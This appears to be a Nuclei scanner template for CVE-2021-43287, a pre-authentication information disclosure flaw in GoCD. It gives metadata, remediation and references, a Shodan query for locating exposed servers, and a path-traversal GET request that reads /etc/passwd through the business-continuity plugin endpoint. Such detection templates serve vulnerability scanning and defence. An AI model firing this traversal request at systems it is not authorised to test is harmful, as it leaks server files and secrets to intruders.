id: CVE-2021-43287

info:
  name: Pre-Auth Takeover of Build Pipelines in GoCD
  author: dhiyaneshDk
  severity: high
  description: GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access and control over the build pipelines, potentially resulting in the execution of arbitrary code or unauthorized modifications.
  remediation: Upgrade to version v21.3.0. or later.
  reference:
    - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
    - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
    - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
    - https://www.gocd.org/releases/#21-3-0
    - https://github.com/gocd/gocd/commit/41abc210ac4e8cfa184483c9ff1c0cc04fb3511c
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-43287
    cwe-id: CWE-200
    epss-score: 0.59294
    epss-percentile: 0.97471
    cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: thoughtworks
    product: gocd
    shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version"
  tags: cve2021,cve,go,lfi,gocd,thoughtworks

http:
  - method: GET
    path:
      - "{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d0200eeb5397b87ed805111ba73b1f44e9e642500d7a6b71f5b6a960dc8d1549022050d924940eadf44a9064cfa5bcaa5f15133215a9364c377111696b5ac33dd637:922c64590222798bb761d5b6d8e72950